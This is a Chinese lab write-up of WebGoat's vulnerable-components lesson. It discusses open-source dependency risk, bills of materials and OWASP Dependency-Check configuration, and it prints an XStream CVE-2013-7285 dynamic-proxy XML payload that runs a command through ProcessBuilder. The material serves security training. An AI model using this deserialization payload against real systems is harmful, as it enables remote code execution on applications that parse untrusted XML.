webgoat靶场攻关

这篇具有很好参考价值的文章主要介绍了webgoat靶场攻关。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

01易受攻击的组件

我们开发软件的方式改变了,开源社区越来越成功,开源软件的可用性越来越丰富,使得我们不需要考虑这些组件的来源。
本节我们要面对管理依赖库的难题,管理这些依赖组件的不是最有风险的,最有风险的是判断我们是否在风险之中。

目标

  • 意识到使用的开源代码与您自己的自定义代码一样重要。
  • 了解我们的开源组件使用中的管理或缺乏管理。
  • 了解物料清单在确定开源组件风险方面的重要性。

webgoat靶场攻关,安全测试,安全

02 开源生态系统

10+ 百万 GitHub 代码仓库
1 万个 Sourceforge 代码库
2500 个公共二进制存储库
某些存储库具有严格的发布者标准
某些存储库强制执行源代码分发
不能保证已发布的源代码是已发布二进制文件的源代码
某些存储库允许为同一版本重新发布一组不同的位
某些存储库允许您删除已发布的项目
许多不同的包装系统;即使是同一种语言
不同的坐标系和粒度级别
早在2013年,OWASP就意识到,“我们”需要关注开源组件中的漏洞这个问题。

03

webgoat靶场攻关,安全测试,安全

04组件无处不在

WebGoat 使用近 200 个 Java 和 JavaScript 库。像大多数 Java 应用程序一样,我们使用 maven 来管理我们的 java 依赖项,并且我们采用狂野的西部策略来管理 JavaScript。

WebGoat 中易受攻击的组件?
创建本课程时,WebGoat 在其组件中包含十几个高安全风险。其中大多数都不是经过深思熟虑的选择。开发人员应该如何在数百个组件中跟踪这些信息?
webgoat靶场攻关,安全测试,安全

05 漏洞并不总是在“您的”代码中

下面是使用相同 WebGoat 源代码但不同版本的 jquery-ui 组件的示例
两个组件,一个点击go显示alert,一个不显示,说明第二个防御了XSS。
webgoat靶场攻关,安全测试,安全

06 Knowing the OSS “Bill of Materials” is the starting point

了解OSS“物料清单”是起点
现代应用程序由自定义代码和许多开源部分组成。开发人员通常非常了解他们的自定义代码,但不太熟悉他们使用的库/组件的潜在风险。将物料清单视为配方中的成分列表。

我们应该知道答案的问题:
我们如何知道我们的应用程序中有哪些开源组件?
我们如何知道我们正在使用什么版本的开源组件?
我们如何定义开源组件的风险?
我们如何发现开源组件的风险?
我们如何将特定风险与开源组件的特定版本相关联?
我们如何知道组件何时发布新版本?
我们如何知道是否在以前的“良好”组件上发现了新的漏洞?

如何生成物料清单

有几种开源和付费解决方案可以识别组件中的风险。但是,没有多少工具可以提供应用程序中使用的“成分”的完整列表。OWASP 依赖关系检查提供了生成物料清单和识别潜在安全风险的能力。

依赖项检查使用多个证据来确定库名称。例如,您可以将 OWASP 依赖项检查作为插件添加到 Maven 项目的 pom.xml 中。该插件将从公共漏洞数据库下载信息,并检查是否使用了易受攻击的库,并指示报告了哪个漏洞。

作为开发管道的一部分,如果存在开发团队不知道的违规行为,您可以指示插件使构建失败。此外,您可以使用 xml 文件来放弃某些违规行为。如果无法在应用程序中利用上述漏洞,则应这样做。

<plugin>
        <groupId>org.owasp</groupId>
        <artifactId>dependency-check-maven</artifactId>
        <version>5.3.2</version>
        <configuration>
                <failBuildOnCVSS>7</failBuildOnCVSS>
                <skipProvidedScope>true</skipProvidedScope>
                <skipRuntimeScope>true</skipRuntimeScope>
                <suppressionFiles>
                        <suppressionFile>project-suppression.xml</suppressionFile>
                </suppressionFiles>
        </configuration>
        <executions>
                <execution>
                        <goals>
                                <goal>check</goal>
                        </goals>
                </execution>
        </executions>
</plugin>

And also an example of the suppressed violations.

<?xml version="1.0" encoding="UTF-8"?>
<suppressions xmlns="https://jeremylong.github.io/DependencyCheck/dependency-suppression.1.3.xsd">
    <suppress base="true">
        <cpe>cpe:/a:pivotal_software:spring_security</cpe>
        <cve>CVE-2018-1258</cve>
    </suppress>
    <suppress base="true"><!-- webgoat-server -->
        <cpe>cpe:/a:postgresql:postgresql</cpe>
        <cve>CVE-2018-10936</cve>
    </suppress>
</suppressions>

在IDEA版本执行 mvn clean install -Powasp
webgoat靶场攻关,安全测试,安全

08 安全信息过载

什么是重要的?

我的组件是否可被利用?
我的组件是真实的副本吗?
我是否了解为什么我的组件被修改了?

安全信息散落在各处

多个安全公告来源
80,000+ CVE 在国家漏洞数据库中
节点安全项目、Metasploit、VulnDB、Snyk…
数以千计的网站安全公告、博客、推文…
每天生成 600,000 个 GitHub 事件
700 个 GitHub 安全相关事件
发行说明、更改日志、代码注释…

总结

期望开发人员不断研究每个组件是不合理的。
开发人员不是安全专家;他们已经有了一份日常工作。

许可证信息过载

什么是重要的?

我可以在软件分发的上下文中使用此组件吗?
是否存在许可证不兼容问题?
如果使用修改后的组件,我是否履行了额外的许可义务?

许可证信息散落在各处

项目声明许可证:
在项目元数据文件中。
在项目网站或源代码存储库页面上。
在他们自己的源代码存储库中使用指向许可证文件的链接。
在项目源代码树中的许可证文件中。
在二进制 META-INF 文件夹中。
项目在源代码中包含许可证作为标头。

总结

很难确定许可证的范围。
一个项目通常存在许可证差异。
开发商不是律师。

09 架构信息

什么是重要的?

我的组件是旧的还是稳定的
我的组件不受欢迎吗
我没有升级是故意选择还是缺乏知识

总结

使组件保持最新状态确实很困难
对于在 25,000 个应用程序中分析的组件,发现:
8% 的 2 年旧组件没有更新的版本
23% 的 11 年旧组件没有更新的版本
较旧的组件构成了大部分风险
webgoat靶场攻关,安全测试,安全

11OSS风险的一些例子

共享资源收藏

2015 年 8 月,Apache Commons Collections 组件的最新版本已经发布了 <> 年。Commons Collections被认为是一个可靠和稳定的组件。一位研究人员发现了一种方法来利用共享资源集合中的反序列化问题,从而导致远程代码执行。第二天…每个使用Commons Collections的人都陷入了恐慌。

参考:数以千计的 Java 应用程序容易受到 9 个月前的远程代码执行漏洞的攻击
http://www.pcworld.com/article/3004633/business-security/thousands-of-java-applications-vulnerable-to-nine-month-old-remote-code-execution-exploit.html

Dinis Cruz 和 Alvaro Munoz 对 XStream 的利用

XStream 是一个相对常见的 XML 和 JSON 解析库,它有一个令人讨厌的远程代码执行。
参考:Dinis Cruz 博客
pwntester/XStreamPOC

在尝试本课程之前,您可能需要阅读这些文章。让我们看看你是否能弄清楚如何在 WebGoat 中利用这一点。

XStream

https://x-stream.github.io/CVE-2013-7285.html
CVE-2013-7285: XStream可以用来进行远程代码执行

0x12

利用CVE-2013-7285 (XStream)
本课程仅在您使用 WebGoat 的 Docker 映像时有效。
WebGoat 使用 XML 文档将联系人添加到联系人数据库。

<contact>
    <id>1</id>
    <firstName>Bruce</firstName>
    <lastName>Mayhew</lastName>
    <email>webgoat@owasp.org</email>
</contact>

本练习所需的 java 接口是:org.owasp.webgoat.vulnerable_components.Contact。首先发送上述联系人,看看正常的响应是什么,然后阅读 CVE 漏洞文档(搜索互联网)并尝试触发该漏洞。对于本示例,我们将让您直接输入 XML,而不是拦截请求并修改数据。您提供联系人的 XML 表示形式,WebGoat 将使用 将其转换为 Contact 对象XStream.fromXML(xml)
webgoat靶场攻关,安全测试,安全
直接输入,提示没有远程代码执行
输入POC,应该过的,但是我这还是报错,没找到原因。

<contact class='dynamic-proxy'>
  <interface>org.owasp.webgoat.vulnerable_components.Contact</interface>
  <handler class='java.beans.EventHandler'>
    <target class='java.lang.ProcessBuilder'>
      <command>
        <string>calc.exe</string>
      </command>
    </target>
    <action>start</action>
  </handler>
</contact>

13 总结

现代应用程序中的开源消费有所增加。
开源是从许多具有不同质量标准的不同存储库中获得的。
有关漏洞的安全信息散落在各处。
许可证信息通常难以验证。
大多数团队没有组件升级策略。
开源组件是新的攻击媒介。

应采取的措施

生成 OSS 物料清单。
使用自动化工具 http://lmgtfy.com/?q=OSS+bill+of+materials
组织中的开源使用基线。
制定开源组件风险管理策略,以减轻当前风险并降低未来风险(华为对开源组件都会进行统一管理)文章来源地址https://www.toymoban.com/news/detail-742231.html

到了这里,关于webgoat靶场攻关的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 渗透学习-靶场篇-WebGoat靶场(JWT攻击)

    本次主要学习了javaweb项目方面任意出现的一些安全问题,最主要的是有关于JWT身份认证上的攻击,并利用webgoat靶场进行了一些实验。 JWT的全称是Json Web Token。它遵循JSON格式,将用户信息加密到token里,服务器不保存任何用户信息,只保存密钥信息,通过使用特定加密算法验

    2023年04月21日
    浏览(43)
  • API安全学习 - crAPI漏洞靶场与API测试思路

    API是应用程序编程接口(Application Programming Interface)的缩写,是软件系统中不同组件之间进行通信和交互的接口。它是一组定义、规范和协议,用于编写应用程序的软件接口,允许不同应用程序之间进行相互通信和交互。API通常由一系列的函数、协议、工具和标准组成,它们

    2024年02月09日
    浏览(34)
  • BurpSuite实战教程01-web渗透安全测试(靶场搭建及常见漏洞攻防)

    渗透测试(Penetration test)即安全工程师模拟黑客,在合法授权范围内,通过信息搜集、漏洞挖掘、权限提升等行为,对目标对象进行安全测试(或攻击),最终找出安全风险并输出测试报告。 Web渗透测试分为白盒测试和黑盒测试,白盒测试是指目标网站的源码等信息的情况

    2024年02月13日
    浏览(46)
  • 23种设计模式攻关

            单例模式(Singleton Pattern),用于确保一个类只有一个实例,并提供全局访问点。         在某些情况下,我们需要确保一个类只能有一个实例,比如数据库连接、线程池等。单例模式可以解决这个问题,它通过限制类的实例化过程,使得一个类只能创建一个

    2024年02月12日
    浏览(31)
  • 命令执行漏洞--ibos靶场(靶场环境是掌控安全的)

    命令执行:用户传入的参数,会被当成系统指令来执行,指令内容用户可控,属于代码执行的一种 ctrl+u:在view-source模式自动换行 危险函数 1. system()函数:直接执行命令,并且输出 2. exec()函数:默认显示最后一行结果,没有输出 3. shell_exec()函数:多行结果,没有输出 4. pa

    2024年04月16日
    浏览(37)
  • 渗透测试练习靶场汇总

    1、vulstudy https://github.com/c0ny1/vulstudy 2、vulfocus Vulfocus 官网: Document 在线演示: http://vulfocus.fofa.so/ 3、vulnrange https://github.com/wgpsec/VulnRange 1、vulnhub https://www.vulnhub.com 2、vulhub Vulhub - Docker-Compose file for vulnerability environment 3、vulnrange https://github.com/wgpsec/VulnRange 4、vulapps VulApps 18、

    2024年02月02日
    浏览(29)
  • 网络安全常用靶场推荐

    sqli-labs sqli-labs包含了大多数的sql注入类型,以一种闯关模式,对于sql注入进行漏洞利用 下载地址:https://github.com/Audi-1/sqli-labs xss challenges xsschallenges是一个专对于XSS漏洞练习的在线靶场,包含了各种绕过,各种姿势的XSS利用 下载地址:XSS Challenges (by yamagata21) - Stage #1 xss-labs

    2024年02月12日
    浏览(45)
  • 记一次靶场搭建与渗透测试

    通过Windows7打入工作组环境,穿透两层内网拿到DC(域控制器)权限 环境搭建 网络拓扑 虚拟机网络配置 永恒之蓝外网打点 nmap -sS 192.168.2.0/24扫描外网存活主机,发现两台主机192.168.2.128和192.168.2.129,并且445端口都是打开的,可能存在永恒之蓝漏洞 用msf来进行永恒之蓝漏洞的

    2024年01月23日
    浏览(42)
  • 信息安全入门——DVWA靶场搭建

    写在前面:作为刚接触信安的菜鸟,仅将自己的经验分享给大家。如有纰漏欢迎师傅们指正 DVWA搭建所需:                 PHP环境: W indows A pache M ysql P hp(不想自己弄也可直接用phpstudy)                 DVWA源代码(打包见文末) 本文以phpstudy为例 1.下载并安

    2024年02月13日
    浏览(37)
  • burp靶场--WebSockets安全漏洞

    https://portswigger.net/web-security/websockets/what-are-websockets 实验1:操纵WebSocket消息以利用漏洞 实验2:跨站WebSocket劫持【注意实验实验高版本burp和火狐浏览器】 实验聊天窗口向服务端发送消息,查看代理中websockets历史: 在Burp代理的HTTP历史记录选项卡中,找到WebSocket握手请求。观察请

    2024年01月25日
    浏览(33)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包